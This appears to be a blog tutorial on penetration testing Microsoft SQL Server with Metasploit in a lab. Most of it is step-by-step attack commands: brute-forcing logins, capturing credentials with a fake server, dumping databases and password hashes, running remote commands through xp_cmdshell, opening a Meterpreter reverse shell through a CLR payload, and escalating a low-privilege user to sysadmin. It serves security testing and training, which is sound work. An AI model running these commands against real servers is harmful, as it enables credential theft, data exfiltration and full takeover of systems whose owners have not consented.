In this article, we will learn in detail how to pentest MSSQL servers using the Metasploit framework.
Table of content:
·
Introduction
·
Information Gathering &
Enumeration
o
Locating MSSQL Server
o
Password Cracking
o
Retrieving MSSQL version
o
MSSQL Enumeration
o
SQL Users Enumeration
o
Capturing MSSQL login
o
Creating Database
o
Dumping Database
o
SchemaDump
o
Hashdump
·
Command Exceution
o
Xp_cmdshell
o
MSSQl_exec
o
CLR Assembely
·
Privilege Escalation
o
Public to Sysadmin
o
Impersonation
Introduction
Metasploit is an excellent framework developed
by H. D. Moore. It is a free and lightweight tool for penetration testing. It
is open-source and cross-platform and has a range of features. Its popularity
rests primarily on the fact that it is a powerful tool for auditing security.
While this is true, it also has many features that can help people protect
themselves. Personally speaking, this is my go-to tool for testing as it
encapsulates the exploit a pentester can ever need. Through this article, we
will learn how to use Metasploit to exploit MSSQL. Therefore, we will go
through every exploit Metasploit has to offer step by step, from finding the
MSSQL server in the network to retrieving the sensitive information from the
database and gaining control. Without any further ado, let us begin.
Information
Gathering & Enumeration
Locating
MSSQL Server
When testing MSSQL servers, whether remotely or
locally, our first requirement is to find the server in the network. And for
this, we will use the following exploit in Metasploit:
use auxiliary/scanner/mssql/mssql_ping
set rhosts 192.168.1.1/24
exploit
Password
Cracking
We have found the server, so our next step is
to retrieve the credentials of the server. We will enforce a dictionary attack
for this, with the help of the following exploit:
use auxiliary/scanner/mssql/mssql_login
set rhosts 192.168.1.3
set user_file /root/users.txt
set verbose false
exploit
And you can see
in the image above, we have the credentials.
Retrieving
MSSQL version
We can also get all the information about the
MSSQL server and its version with the help of the following exploit:
use auxiliary/admin/mssql/mssql_sql
set rhosts 192.168.1.3
set username lowprwiv
set password Password@1
exploit
MSSQL
Enumeration
Let's now enumerate the server and see what all
information we can get. And for this, we will use the following exploit:
use auxiliary/admin/mssql/mssql_enum
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
As the result of the above exploit, you can see
what permissions are given to the database, which logins are available with
other helpful information. The same can be seen in the image above.
SQL Users
Enumeration
We can also find the proper login list of all
the users on the server. Metasploit provides us with a particular exploit for
just this task. And the exploit is the following:
use auxiliary/admin/mssql/mssql_enum_sql_login
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
And as a result, you can see in the above image
that the list of all users will be provided to you.
Capturing
MSSQL login
The next exploit that we are going to use
capture/mssql. This exploit creates a fake server and tries to capture the
authenticated credentials from the original server. To use this exploit, type;
use auxiliary/server/capture/mssql
set srvhost 192.168.1.2
exploit
Now, if the user tries to log in to the server,
for instance, we will have the credentials with the following command:
sqsh -S 192.168.1.2 -U sa -P "password@1"
And when you check your Metasploit, voila! You
will have the correct login credentials of the server, which you can see in the
image below as well:
Creating
Database
Usually, any MSSQL server that you are pentesting
will have a database. But as the server on which we are performing this
penetration testing is new as we also wanted to show the lab setup; therefore,
for our next exploit to work, we will be creating a database in our server. To
make the database, use the following command:
create database bank;
As the above query execute itself successfully,
our next step is to type in the following query:
CREATE TABLE Customers (
CustomerID int,
LastName varchar(255),
FirstName varchar(255),
passw
varchar(255),
creditcard varchar(255)
);
And so, as you can see in the image above, our
table is created. Now, let's add data to our table with the help of the
following query:
INSERT INTO Customers(CustomerID, LastName,
FirstName, passw, creditcard)
VALUES ('01', 'Technologies','Ignite',
'admin123', '1111-2222-3333-4444');
INSERT INTO Customers(CustomerID, LastName,
FirstName, passw, creditcard)
VALUES ('02', 'Sharma','Nisha', 'admin1234',
'5555-6666-7777-8888');
INSERT INTO Customers(CustomerID, LastName,
FirstName, passw, creditcard)
VALUES ('03', 'Chandel','Raj', 'admin12345',
'9999-1010-1020-1030');
INSERT INTO Customers(CustomerID, LastName,
FirstName, passw, creditcard)
VALUES ('04', 'Madan','Geet', 'admin12311',
'1234-5678-9012-3456');
This way, you can create your database.
Dumping Database
Now that we have our database, let us learn how
we can dump the content of the database with the help of Metasploit. Luckily,
Metasploit has a particular exploit dedicated to dumping the content of the
database. And to use the said exploit type:
use
auxiliary/admin/mssql/mssql_findandsampledata
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set sample_size 4
set keywords FirstName | passw | credit
exploit
Thus, using the above exploit will give the
desired content of the database. For instance, the data we dumped had the
information of the stored credit cards of the users.
SchemaDump
The next exploit that we are going to use will
dumb the schema of the server. And to use this exploit, use the following set
of commands:
use auxiliary/scanner/mssql/mssql_schemadump
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
And so, with the help of the above exploit, we
have the data from the server.
Hashdump
Last but not least, our next exploit is used to
dump the hashes of the users from the server. To use this exploit, type:
use auxiliary/scanner/mssql/mssql_hashdump
set rhosts 192.168.1.149
set username sa
set password Password@1
expoit
Command Exceution
Xp_cmdshell
We found the MSSQL server in the network,
retrieved the credentials, impersonated the user to have higher privileges. So
now, let us try and get a meterpreter session of the server by exploit
xp_cmdshell by using the following exploit:
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
As you can see in the above image, the exploit
is trying to enable the xp_cmdshell to have our session. We have written a
detailed article on xp_cmdshell, which you can read here.
Once the xp_cmdshel is successfully enabled, we will have our meterpreter
session as shown in the image below:
MSSQl_exec
Now, if we want to execute a command on the
server, we can do that remotely with the help of Metasploit's following
exploit:
use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set cmd "net user"
exploit
And as you can see in the image above, the
exploit is executed successfully, and we have our desired result, i.e., the
list of all the net users.
Another method to execute the desired command
is to first write the command in .sql file with the following command:
cat user.sql
CREATE LOGIN test1 WITH PASSWORD = 'Password@1';
Now we
can use this .sql to run on the server, remotely, with the help of the
following exploit:
use auxiliary/admin/mssql/mssql_sql_file
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set sql_file /root/user.sql
exploit
And as a result, the above exploit will create
a user with the name of test1. You can manually go to the server and confirm
the creation of the user as shown in the image below:
CLR Assembely
The next exploit will help to take advantage of
the CLR integration. This exploit will enable CLR integration, and along with
that, it will also activate the trustworthy database property. After the
exploit gives you the session, it restores all the settings to their original
form. To use this exploit, type:
use exploit/windows/mssql/mssql_clr_payload
set payload windows/x64/meterpreter/reverse_tcp
set username lowpriv
set password Password@1
exploit
And as you can see, the exploit followed all
the steps to exploit CLR integration to our potential. And it gives out the
meterpreter session as shown in the image above.
Privilege
Escalation
Public to
Sysadmin
Now that we have the user's credentials, we can
use the following exploit escalate privileges for our user. This exploit will
manipulate the trustworthy property of the database and give you all the
privileges you desire. And for this, we will use the following exploit:
use
auxiliary/admin/mssql/mssql_escalate_dbowner
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
Note: To deeply understand the working of this
exploit, read our other article
here.
As you can see above, we got sysadmin
privileges for our user.
Impersonation
Another method to gain privileges is by
impersonating another user. And the following exploit will help us do precisely
that; it will let our user impersonate other users to gain sysadmin privilege.
To use this exploit, use the following set of commands:
use
auxiliary/admin/mssql/mssql_escalate_execute_as
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
Now, as you can see in the image above, the
lowpriv user can impersonate sa user. Sa user is a member of sysadmin, and with
the help of the above exploit, lowpriv is now a sysadmin too, as it
impersonated sa user.
All in all, Metasploit is one of the best tools
to pentest MSSQL servers as it offers so many exploits and multiple ways to do
so.
0 comments:
Post a Comment